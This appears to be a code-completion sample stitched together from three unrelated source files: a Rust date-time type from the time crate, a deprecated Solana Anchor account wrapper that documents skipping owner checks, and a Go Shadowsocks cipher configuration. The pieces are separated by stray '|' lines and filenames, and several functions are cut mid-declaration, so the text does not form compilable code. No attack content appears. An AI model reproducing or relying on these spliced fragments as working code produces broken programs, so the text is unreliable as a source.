#[cfg_attr(feature = "serde", derive(serde::Serialize, serde::Deserialize))]
#[cfg_attr(
feature = "serde",
serde(
into = "crate::serde::PrimitiveDateTime",
try_from = "crate::serde::PrimitiveDateTime"
)
)]
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, PartialOrd, Ord)]
pub struct PrimitiveDateTime {
#[allow(clippy::missing_docs_in_private_items)]
pub(crate) date: Date,
#[allow(clippy::missing_docs_in_private_items)]
pub(crate) time: Time,
}
impl PrimitiveDateTime {
/// Create a new `PrimitiveDateTime` from the provided [`Date`] and
/// [`Time`].
///
/// ```rust
/// # use time::PrimitiveDateTime;
/// # use time_macros::{date, datetime, time};
/// assert_eq!(
/// PrimitiveDateTime::new(date!("2019-01-01"), time!("0:00")),
/// datetime!("2019-01-01 0:00"),
/// );
/// ```
pub const fn new(date: Date, time: Time) -> Self {
Self { date, time }
}
/// Get the [`Date`] component of the `PrimitiveDateTime`.
///
/// ```rust
/// # use time_macros::{date, datetime};
/// assert_eq!(datetime!("2019-01-01 0:00").date(), date!("2019-01-01"));
/// ```
pub const fn date(self) -> Date {
self.date
}
/// Get the [`Time`] component of the `PrimitiveDateTime`.
///
/// ```rust
/// # use time_macros::{datetime, time};
/// assert_eq!(datetime!("2019-01-01 0:00").time(), time!("0:00"));
pub const fn time(self) -> Time {
self.time
}
/// Get the year of the date.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").year(), 2019);
|
/// assert_eq!(datetime!("2019-12-31 0:00").year(), 2019);
/// assert_eq!(datetime!("2020-01-01 0:00").year(), 2020);
/// ```
pub const fn year(self) -> i32 {
self.date.year()
}
/// Get the month of the date.
///
/// The returned value will always be in the range `1..=12`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").month(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").month(), 12);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn month(self) -> u8 {
self.date.month()
}
/// Get the day of the date.
///
/// The returned value will always be in the range `1..=31`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").day(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").day(), 31);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn day(self) -> u8 {
self.date.day()
}
/// Get the day of the year.
///
/// The returned value will always be in the range `1..=366` (`1..=365` for
/// common years).
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").ordinal(), 1);
/// assert_eq!(datetime!("2019-12-31 0:00").ordinal(), 365);
/// ```
pub const fn ordinal(self) -> u16 {
self.date.ordinal()
}
/// Get the ISO week number.
///
/// The returned value will always be in the range `1..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").iso_week(), 1);
/// assert_eq!(datetime!("2019-10-04 0:00").iso_week(), 40);
/// assert_eq!(datetime!("2020-01-01 0:00").iso_week(), 1);
/// assert_eq!(datetime!("2020-12-31 0:00").iso_week(), 53);
/// assert_eq!(datetime!("2021-01-01 0:00").iso_week(), 53);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn iso_week(self) -> u8 {
self.date.iso_week()
}
/// Get the week number where week 1 begins on the first Sunday.
///
/// The returned value will always be in the range `0..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").sunday_based_week(), 0);
/// assert_eq!(datetime!("2020-01-01 0:00").sunday_based_week(), 0);
/// assert_eq!(datetime!("2020-12-31 0:00").sunday_based_week(), 52);
/// assert_eq!(datetime!("2021-01-01 0:00").sunday_based_week(), 0);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn sunday_based_week(self) -> u8 {
self.date.sunday_based_week()
}
/// Get the week number where week 1 begins on the first Monday.
///
/// The returned value will always be in the range `0..=53`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").monday_based_week(), 0);
/// assert_eq!(datetime!("2020-01-01 0:00").monday_based_week(), 0);
/// assert_eq!(datetime!("2020-12-31 0:00").monday_based_week(), 52);
/// assert_eq!(datetime!("2021-01-01 0:00").monday_based_week(), 0);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn monday_based_week(self) -> u8 {
self.date.monday_based_week()
}
/// Get the year, month, and day.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").to_calendar_date(),
/// (2019, 1, 1)
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_calendar_date(self) -> (i32, u8, u8) {
self.date.to_calendar_date()
}
/// Get the year and ordinal day number.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").to_ordinal_date(), (2019, 1));
/// ```
pub const fn to_ordinal_date(self) -> (i32, u16) {
self.date.to_ordinal_date()
}
/// Get the ISO 8601 year, week number, and weekday.
///
/// ```rust
/// # use time::Weekday::*;
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").to_iso_week_date(),
/// (2019, 1, Tuesday)
/// );
/// assert_eq!(
/// datetime!("2019-10-04 0:00").to_iso_week_date(),
/// (2019, 40, Friday)
/// );
/// assert_eq!(
/// datetime!("2020-01-01 0:00").to_iso_week_date(),
/// (2020, 1, Wednesday)
/// );
/// assert_eq!(
/// datetime!("2020-12-31 0:00").to_iso_week_date(),
/// (2020, 53, Thursday)
/// );
/// assert_eq!(
/// datetime!("2021-01-01 0:00").to_iso_week_date(),
/// (2020, 53, Friday)
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_iso_week_date(self) -> (i32, u8, Weekday) {
self.date.to_iso_week_date()
}
/// Get the weekday.
///
/// ```rust
/// # use time::Weekday::*;
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").weekday(), Tuesday);
/// assert_eq!(datetime!("2019-02-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-03-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-04-01 0:00").weekday(), Monday);
/// assert_eq!(datetime!("2019-05-01 0:00").weekday(), Wednesday);
/// assert_eq!(datetime!("2019-06-01 0:00").weekday(), Saturday);
/// assert_eq!(datetime!("2019-07-01 0:00").weekday(), Monday);
/// assert_eq!(datetime!("2019-08-01 0:00").weekday(), Thursday);
/// assert_eq!(datetime!("2019-09-01 0:00").weekday(), Sunday);
/// assert_eq!(datetime!("2019-10-01 0:00").weekday(), Tuesday);
/// assert_eq!(datetime!("2019-11-01 0:00").weekday(), Friday);
/// assert_eq!(datetime!("2019-12-01 0:00").weekday(), Sunday);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn weekday(self) -> Weekday {
self.date.weekday()
}
/// Get the Julian day for the date. The time is not taken into account for
/// this calculation.
///
/// The algorithm to perform this conversion is derived from one provided by
/// Peter Baum; it is freely available
/// [here](https://www.researchgate.net/publication/316558298_Date_Algorithms).
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("-4713-11-24 0:00").to_julian_day(), 0);
/// assert_eq!(datetime!("2000-01-01 0:00").to_julian_day(), 2_451_545);
/// assert_eq!(datetime!("2019-01-01 0:00").to_julian_day(), 2_458_485);
/// assert_eq!(datetime!("2019-12-31 0:00").to_julian_day(), 2_458_849);
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn to_julian_day(self) -> i32 {
self.date.to_julian_day()
}
/// Get the clock hour, minute, and second.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms(), (0, 0, 0));
/// assert_eq!(datetime!("2020-01-01 23:59:59").as_hms(), (23, 59, 59));
/// ```
pub const fn as_hms(self) -> (u8, u8, u8) {
self.time.as_hms()
}
/// Get the clock hour, minute, second, and millisecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_milli(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999").as_hms_milli(),
/// (23, 59, 59, 999)
/// );
/// ```
pub const fn as_hms_milli(self) -> (u8, u8, u8, u16) {
self.time.as_hms_milli()
}
/// Get the clock hour, minute, second, and microsecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_micro(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999_999").as_hms_micro(),
/// (23, 59, 59, 999_999)
/// );
/// ```
pub const fn as_hms_micro(self) -> (u8, u8, u8, u32) {
self.time.as_hms_micro()
}
/// Get the clock hour, minute, second, and nanosecond.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2020-01-01 0:00:00").as_hms_nano(), (0, 0, 0, 0));
/// assert_eq!(
/// datetime!("2020-01-01 23:59:59.999_999_999").as_hms_nano(),
/// (23, 59, 59, 999_999_999)
/// );
/// ```
pub const fn as_hms_nano(self) -> (u8, u8, u8, u32) {
self.time.as_hms_nano()
}
/// Get the clock hour.
///
/// The returned value will always be in the range `0..24`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").hour(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").hour(), 23);
/// ```
pub const fn hour(self) -> u8 {
self.time.hour
}
/// Get the minute within the hour.
///
/// The returned value will always be in the range `0..60`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").minute(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").minute(), 59);
/// ```
pub const fn minute(self) -> u8 {
self.time.minute
}
/// Get the second within the minute.
///
/// The returned value will always be in the range `0..60`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").second(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59").second(), 59);
/// ```
pub const fn second(self) -> u8 {
self.time.second
}
/// Get the milliseconds within the second.
///
/// The returned value will always be in the range `0..1_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").millisecond(), 0);
/// assert_eq!(datetime!("2019-01-01 23:59:59.999").millisecond(), 999);
/// ```
pub const fn millisecond(self) -> u16 {
self.time.millisecond()
}
/// Get the microseconds within the second.
///
/// The returned value will always be in the range `0..1_000_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").microsecond(), 0);
/// assert_eq!(
/// datetime!("2019-01-01 23:59:59.999_999").microsecond(),
/// 999_999
/// );
/// ```
pub const fn microsecond(self) -> u32 {
self.time.microsecond()
}
/// Get the nanoseconds within the second.
///
/// The returned value will always be in the range `0..1_000_000_000`.
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(datetime!("2019-01-01 0:00").nanosecond(), 0);
/// assert_eq!(
/// datetime!("2019-01-01 23:59:59.999_999_999").nanosecond(),
/// 999_999_999,
/// );
/// ```
pub const fn nanosecond(self) -> u32 {
self.time.nanosecond
}
/// Assuming that the existing `PrimitiveDateTime` represents a moment in
/// the provided [`UtcOffset`], return an [`OffsetDateTime`].
///
/// ```rust
/// # use time_macros::{datetime, offset};
/// assert_eq!(
/// datetime!("2019-01-01 0:00")
/// .assume_offset(offset!("UTC"))
/// .unix_timestamp(),
/// 1_546_300_800,
/// );
/// assert_eq!(
/// datetime!("2019-01-01 0:00")
/// .assume_offset(offset!("-1"))
/// .unix_timestamp(),
/// 1_546_304_400,
/// );
/// ```
///
/// This function is `const fn` when using rustc >= 1.46.
#[const_fn("1.46")]
pub const fn assume_offset(self, offset: UtcOffset) -> OffsetDateTime {
OffsetDateTime {
utc_datetime: self.offset_to_utc(offset),
offset,
}
}
/// Assuming that the existing `PrimitiveDateTime` represents a moment in
/// the UTC, return an [`OffsetDateTime`].
///
/// ```rust
/// # use time_macros::datetime;
/// assert_eq!(
/// datetime!("2019-01-01 0:00").assume_utc().unix_timestamp(),
/// 1_546_300_800,
/// );
/// ```
pub const fn assume_utc(self) -> OffsetDateTime {
OffsetDateTime {
utc_datetime: self,
offset: UtcOffset::UTC,
}
}
}
/// Methods that replace part of the `PrimitiveDateTime`.
impl PrimitiveDateTime {
/// Replace the time, preserving the date.
///
/// ```rust
/// # use time_macros::{datetime, time};
/// assert_eq!(
/// datetime!("2020-01-01 17:00").replace_time(time!("5:00")),
/// datetime!("2020-01-01 5:00")
/// );
/// ```
#[must_use = "This method does not mutate the original `PrimitiveDateTime`."]
pub const fn replace_time(self, time: Time) -> Self {
self.date.with_time(time)
}
/// Replace the date, preserving the time.
///
/// ```rust
/// # use time_macros::{datetime, date};
/// assert_eq!(
/// datetime!("2020-01-01 12:00").replace_date(date!("2020-01-30")),
/// datetime!("2020-01-30 12:00")
/// );
/// ```
#[must_use = "This method does not mutate the original `PrimitiveDateTime`."]
pub const fn replace_date(self, date: Date) -> Self {
date.with_time(self.time)
}
}
/// Helper methods to adjust a [`PrimitiveDateTime`] to a given [`UtcOffset`].
impl PrimitiveDateTime {
/// Assuming that the current [`PrimitiveDateTime`] is a value in the
/// provided [`UtcOffset`], obtain the equivalent value in the UTC.
#[const_fn("1.46")]
pub(crate) const fn offset_to_utc(self, offset: UtcOffset) -> Self {
let mut second = self.second() as i8 - offset.seconds;
let mut minute = self.minute() as i8 - offset.minutes;
let mut hour = self.hour() as i8 - offset.hours;
let (mut year, mut ordinal) = self.date.to_ordinal_date();
if second >= 60 {
second -= 60;
minute += 1;
} else if second < 0 {
second += 60;
minute -= 1;
}
if minute >= 60 {
minute -= 60;
hour += 1;
} else if minute < 0 {
minute += 60;
hour -= 1;
}
if hour >= 24 {
hour -= 24;
ordinal += 1;
} else if hour < 0 {
hour += 24;
ordinal -= 1;
}
if ordinal > util::days_in_year(year) {
year += 1;
ordinal = 1;
} else if ordinal == 0 {
year -= 1;
ordinal = util::days_in_year(year);
}
Self {
date: Date::from_ordinal_date_unchecked(year, ordinal),
time: Time {
hour: hour as _,
minute: minute as _,
second: second as _,
nanosecond: self.nanosecond(),
padding: hack::Padding::Optimize,
},
}
}
/// Assuming that the current [`PrimitiveDateTime`] is a value in UTC,
/// obtain the equivalent value in the provided [`UtcOffset`].
#[const_fn("1.46")]
pub(crate) const fn utc_to_offset(self, offset: UtcOffset) -> Self {
self.offset_to_utc(UtcOffset::from_hms_unchecked(
-offset.hours,
-offset.minutes,
-offset.seconds,
))
}
}
impl PrimitiveDateTime {
/// Format the `PrimitiveDateTime` using the provided format description.
/// The formatted value will be output to the provided writer. The format
/// description will typically be parsed by using
/// [`FormatDescription::parse`].
pub fn format_into<'a>(
self,
output: &mut dyn fmt::Write,
description: &FormatDescription<'a>,
) -> Result<(), error::Format> {
description.format_into(output, Some(self.date), Some(self.time), None)
}
/// Format the `PrimitiveDateTime` using the provided format description.
/// The format description will typically be parsed by using
/// [`FormatDescription::parse`].
///
/// ```rust
/// # use time::format_description::FormatDescription;
/// # use time_macros::datetime;
/// let format =
/// FormatDescription::parse("[year]-[month repr:numerical]-[day] [hour]:[minute]:[second]")?;
/// assert_eq!(
/// datetime!("2020-01-02 03:04:05").format(&format)?,
/// "2020-01-02 03:04:05"
/// );
/// # Ok::<_, time::Error>(())
/// ```
#[cfg(feature = "alloc")]
#[cfg_attr(__time_03_docs, doc(cfg(feature = "alloc")))]
pub fn format<'a>(self, description: &FormatDescription<'a>) -> Result<String, error::Format> {
let mut s = String::new();
self.format_into(&mut s, description)?;
Ok(s)
}
}
impl fmt::Display for PrimitiveDateTime {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "{} {}", self.date, self.time)
}
}
impl Add<Duration> for PrimitiveDateTime {
type Output = Self;
fn add(self, duration: Duration) -> Self::Output {
let (date_adjustment, time) = self.time.adjusting_add(duration);
let date = self.date + duration;
Self {
date: match date_adjustment {
util::DateAdjustment::Previous => date.previous_day(),
util::DateAdjustment::Next => date.next_day(),
util::DateAdjustment::None => date,
},
time,
}
}
}
impl Add<StdDuration> for PrimitiveDateTime {
type Output = Self;
fn add(self, duration: StdDuration) -> Self::Output {
let (is_next_day, time) = self.time.adjusting_add_std(duration);
Self {
date: if is_next_day {
(self.date + duration).next_day()
} else {
self.date + duration
},
time,
}
}
}
impl AddAssign<Duration> for PrimitiveDateTime {
fn add_assign(&mut self, duration: Duration) {
*self = *self + duration;
}
}
impl AddAssign<StdDuration> for PrimitiveDateTime {
fn add_assign(&mut self, duration: StdDuration) {
*self = *self + duration;
}
}
impl Sub<Duration> for PrimitiveDateTime {
type Output = Self;
fn sub(self, duration: Duration) -> Self::Output {
self + -duration
}
}
impl Sub<StdDuration> for PrimitiveDateTime {
type Output = Self;
fn sub(self, duration: StdDuration) -> Self::Output {
let (is_previous_day, time) = self.time.adjusting_sub_std(duration);
Self {
date: if is_previous_day {
(self.date - duration).previous_day()
} else {
self.date - duration
},
time,
}
}
}
impl SubAssign<Duration> for PrimitiveDateTime {
fn sub_assign(&mut self, duration: Duration) {
*self = *self - duration;
}
}
impl SubAssign<StdDuration> for PrimitiveDateTime {
fn sub_assign(&mut self, duration: StdDuration) {
*self = *self - duration;
}
}
impl Sub<PrimitiveDateTime> for PrimitiveDateTime {
type Output = Duration;
fn sub(self, rhs: Self) -> Self::Output {
(self.date - rhs.date) + (self.time - rhs.time)
}
}
| |
cpi_account.rs
|
use crate::error::ErrorCode;
use crate::*;
use solana_program::account_info::AccountInfo;
use solana_program::entrypoint::ProgramResult;
use solana_program::instruction::AccountMeta;
use solana_program::program_error::ProgramError;
use solana_program::pubkey::Pubkey;
use std::ops::{Deref, DerefMut};
/// Container for any account *not* owned by the current program.
#[derive(Clone)]
#[deprecated(note = "Please use Account instead")]
pub struct CpiAccount<'a, T: AccountDeserialize + Clone> {
info: AccountInfo<'a>,
account: Box<T>,
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> CpiAccount<'a, T> {
fn new(info: AccountInfo<'a>, account: Box<T>) -> CpiAccount<'a, T> {
Self { info, account }
}
/// Deserializes the given `info` into a `CpiAccount`.
pub fn try_from(info: &AccountInfo<'a>) -> Result<CpiAccount<'a, T>, ProgramError> {
let mut data: &[u8] = &info.try_borrow_data()?;
Ok(CpiAccount::new(
info.clone(),
Box::new(T::try_deserialize(&mut data)?),
))
}
pub fn try_from_unchecked(info: &AccountInfo<'a>) -> Result<CpiAccount<'a, T>, ProgramError> {
Self::try_from(info)
}
/// Reloads the account from storage. This is useful, for example, when
/// observing side effects after CPI.
pub fn reload(&mut self) -> ProgramResult {
let mut data: &[u8] = &self.info.try_borrow_data()?;
self.account = Box::new(T::try_deserialize(&mut data)?);
Ok(())
}
}
#[allow(deprecated)]
|
where
T: AccountDeserialize + Clone,
{
#[inline(never)]
fn try_accounts(
_program_id: &Pubkey,
accounts: &mut &[AccountInfo<'info>],
_ix_data: &[u8],
) -> Result<Self, ProgramError> {
if accounts.is_empty() {
return Err(ErrorCode::AccountNotEnoughKeys.into());
}
let account = &accounts[0];
*accounts = &accounts[1..];
// No owner check is done here.
let pa = CpiAccount::try_from(account)?;
Ok(pa)
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountMetas for CpiAccount<'info, T> {
fn to_account_metas(&self, is_signer: Option<bool>) -> Vec<AccountMeta> {
let is_signer = is_signer.unwrap_or(self.info.is_signer);
let meta = match self.info.is_writable {
false => AccountMeta::new_readonly(*self.info.key, is_signer),
true => AccountMeta::new(*self.info.key, is_signer),
};
vec![meta]
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountInfos<'info> for CpiAccount<'info, T> {
fn to_account_infos(&self) -> Vec<AccountInfo<'info>> {
vec![self.info.clone()]
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> ToAccountInfo<'info> for CpiAccount<'info, T> {
fn to_account_info(&self) -> AccountInfo<'info> {
self.info.clone()
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> AsRef<AccountInfo<'info>> for CpiAccount<'info, T> {
fn as_ref(&self) -> &AccountInfo<'info> {
&self.info
}
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> Deref for CpiAccount<'a, T> {
type Target = T;
fn deref(&self) -> &Self::Target {
&self.account
}
}
#[allow(deprecated)]
impl<'a, T: AccountDeserialize + Clone> DerefMut for CpiAccount<'a, T> {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.account
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> AccountsExit<'info> for CpiAccount<'info, T> {
fn exit(&self, _program_id: &Pubkey) -> ProgramResult {
// no-op
Ok(())
}
}
#[allow(deprecated)]
impl<'info, T: AccountDeserialize + Clone> Key for CpiAccount<'info, T> {
fn key(&self) -> Pubkey {
*self.info.key
}
}
#[allow(deprecated)]
impl<'info, T> From<Account<'info, T>> for CpiAccount<'info, T>
where
T: AccountSerialize + AccountDeserialize + Owner + Clone,
{
fn from(a: Account<'info, T>) -> Self {
Self::new(a.to_account_info(), Box::new(a.into_inner()))
}
}
|
impl<'info, T> Accounts<'info> for CpiAccount<'info, T>
|
config.go
|
package shadowsocks
import (
"bytes"
"crypto/aes"
"crypto/cipher"
"crypto/md5"
"crypto/sha1"
"io"
"golang.org/x/crypto/chacha20poly1305"
"golang.org/x/crypto/hkdf"
"github.com/perfect-network/v2ray-core/common"
"github.com/perfect-network/v2ray-core/common/buf"
"github.com/perfect-network/v2ray-core/common/crypto"
"github.com/perfect-network/v2ray-core/common/protocol"
)
// MemoryAccount is an account type converted from Account.
type MemoryAccount struct {
Cipher Cipher
Key []byte
}
// Equals implements protocol.Account.Equals().
func (a *MemoryAccount) Equals(another protocol.Account) bool {
if account, ok := another.(*MemoryAccount); ok {
return bytes.Equal(a.Key, account.Key)
}
return false
}
func
|
(key []byte) cipher.AEAD {
block, err := aes.NewCipher(key)
common.Must(err)
gcm, err := cipher.NewGCM(block)
common.Must(err)
return gcm
}
func createChacha20Poly1305(key []byte) cipher.AEAD {
chacha20, err := chacha20poly1305.New(key)
common.Must(err)
return chacha20
}
func (a *Account) getCipher() (Cipher, error) {
switch a.CipherType {
case CipherType_AES_128_CFB:
return &AesCfb{KeyBytes: 16}, nil
case CipherType_AES_256_CFB:
return &AesCfb{KeyBytes: 32}, nil
case CipherType_CHACHA20:
return &ChaCha20{IVBytes: 8}, nil
case CipherType_CHACHA20_IETF:
return &ChaCha20{IVBytes: 12}, nil
case CipherType_AES_128_GCM:
return &AEADCipher{
KeyBytes: 16,
IVBytes: 16,
AEADAuthCreator: createAesGcm,
}, nil
case CipherType_AES_256_GCM:
return &AEADCipher{
KeyBytes: 32,
IVBytes: 32,
AEADAuthCreator: createAesGcm,
}, nil
case CipherType_CHACHA20_POLY1305:
return &AEADCipher{
KeyBytes: 32,
IVBytes: 32,
AEADAuthCreator: createChacha20Poly1305,
}, nil
case CipherType_NONE:
return NoneCipher{}, nil
default:
return nil, newError("Unsupported cipher.")
}
}
// AsAccount implements protocol.AsAccount.
func (a *Account) AsAccount() (protocol.Account, error) {
cipher, err := a.getCipher()
if err != nil {
return nil, newError("failed to get cipher").Base(err)
}
return &MemoryAccount{
Cipher: cipher,
Key: passwordToCipherKey([]byte(a.Password), cipher.KeySize()),
}, nil
}
// Cipher is an interface for all Shadowsocks ciphers.
type Cipher interface {
KeySize() int32
IVSize() int32
NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error)
NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error)
IsAEAD() bool
EncodePacket(key []byte, b *buf.Buffer) error
DecodePacket(key []byte, b *buf.Buffer) error
}
// AesCfb represents all AES-CFB ciphers.
type AesCfb struct {
KeyBytes int32
}
func (*AesCfb) IsAEAD() bool {
return false
}
func (v *AesCfb) KeySize() int32 {
return v.KeyBytes
}
func (v *AesCfb) IVSize() int32 {
return 16
}
func (v *AesCfb) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
stream := crypto.NewAesEncryptionStream(key, iv)
return &buf.SequentialWriter{Writer: crypto.NewCryptionWriter(stream, writer)}, nil
}
func (v *AesCfb) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
stream := crypto.NewAesDecryptionStream(key, iv)
return &buf.SingleReader{
Reader: crypto.NewCryptionReader(stream, reader),
}, nil
}
func (v *AesCfb) EncodePacket(key []byte, b *buf.Buffer) error {
iv := b.BytesTo(v.IVSize())
stream := crypto.NewAesEncryptionStream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
return nil
}
func (v *AesCfb) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= v.IVSize() {
return newError("insufficient data: ", b.Len())
}
iv := b.BytesTo(v.IVSize())
stream := crypto.NewAesDecryptionStream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
b.Advance(v.IVSize())
return nil
}
type AEADCipher struct {
KeyBytes int32
IVBytes int32
AEADAuthCreator func(key []byte) cipher.AEAD
}
func (*AEADCipher) IsAEAD() bool {
return true
}
func (c *AEADCipher) KeySize() int32 {
return c.KeyBytes
}
func (c *AEADCipher) IVSize() int32 {
return c.IVBytes
}
func (c *AEADCipher) createAuthenticator(key []byte, iv []byte) *crypto.AEADAuthenticator {
nonce := crypto.GenerateInitialAEADNonce()
subkey := make([]byte, c.KeyBytes)
hkdfSHA1(key, iv, subkey)
return &crypto.AEADAuthenticator{
AEAD: c.AEADAuthCreator(subkey),
NonceGenerator: nonce,
}
}
func (c *AEADCipher) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
auth := c.createAuthenticator(key, iv)
return crypto.NewAuthenticationWriter(auth, &crypto.AEADChunkSizeParser{
Auth: auth,
}, writer, protocol.TransferTypeStream, nil), nil
}
func (c *AEADCipher) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
auth := c.createAuthenticator(key, iv)
return crypto.NewAuthenticationReader(auth, &crypto.AEADChunkSizeParser{
Auth: auth,
}, reader, protocol.TransferTypeStream, nil), nil
}
func (c *AEADCipher) EncodePacket(key []byte, b *buf.Buffer) error {
ivLen := c.IVSize()
payloadLen := b.Len()
auth := c.createAuthenticator(key, b.BytesTo(ivLen))
b.Extend(int32(auth.Overhead()))
_, err := auth.Seal(b.BytesTo(ivLen), b.BytesRange(ivLen, payloadLen))
return err
}
func (c *AEADCipher) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= c.IVSize() {
return newError("insufficient data: ", b.Len())
}
ivLen := c.IVSize()
payloadLen := b.Len()
auth := c.createAuthenticator(key, b.BytesTo(ivLen))
bbb, err := auth.Open(b.BytesTo(ivLen), b.BytesRange(ivLen, payloadLen))
if err != nil {
return err
}
b.Resize(ivLen, int32(len(bbb)))
return nil
}
type ChaCha20 struct {
IVBytes int32
}
func (*ChaCha20) IsAEAD() bool {
return false
}
func (v *ChaCha20) KeySize() int32 {
return 32
}
func (v *ChaCha20) IVSize() int32 {
return v.IVBytes
}
func (v *ChaCha20) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
stream := crypto.NewChaCha20Stream(key, iv)
return &buf.SequentialWriter{Writer: crypto.NewCryptionWriter(stream, writer)}, nil
}
func (v *ChaCha20) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
stream := crypto.NewChaCha20Stream(key, iv)
return &buf.SingleReader{Reader: crypto.NewCryptionReader(stream, reader)}, nil
}
func (v *ChaCha20) EncodePacket(key []byte, b *buf.Buffer) error {
iv := b.BytesTo(v.IVSize())
stream := crypto.NewChaCha20Stream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
return nil
}
func (v *ChaCha20) DecodePacket(key []byte, b *buf.Buffer) error {
if b.Len() <= v.IVSize() {
return newError("insufficient data: ", b.Len())
}
iv := b.BytesTo(v.IVSize())
stream := crypto.NewChaCha20Stream(key, iv)
stream.XORKeyStream(b.BytesFrom(v.IVSize()), b.BytesFrom(v.IVSize()))
b.Advance(v.IVSize())
return nil
}
type NoneCipher struct{}
func (NoneCipher) KeySize() int32 { return 0 }
func (NoneCipher) IVSize() int32 { return 0 }
func (NoneCipher) IsAEAD() bool {
return true // to avoid OTA
}
func (NoneCipher) NewDecryptionReader(key []byte, iv []byte, reader io.Reader) (buf.Reader, error) {
return buf.NewReader(reader), nil
}
func (NoneCipher) NewEncryptionWriter(key []byte, iv []byte, writer io.Writer) (buf.Writer, error) {
return buf.NewWriter(writer), nil
}
func (NoneCipher) EncodePacket(key []byte, b *buf.Buffer) error {
return nil
}
func (NoneCipher) DecodePacket(key []byte, b *buf.Buffer) error {
return nil
}
func passwordToCipherKey(password []byte, keySize int32) []byte {
key := make([]byte, 0, keySize)
md5Sum := md5.Sum(password)
key = append(key, md5Sum[:]...)
for int32(len(key)) < keySize {
md5Hash := md5.New()
common.Must2(md5Hash.Write(md5Sum[:]))
common.Must2(md5Hash.Write(password))
md5Hash.Sum(md5Sum[:0])
key = append(key, md5Sum[:]...)
}
return key
}
func hkdfSHA1(secret, salt, outkey []byte) {
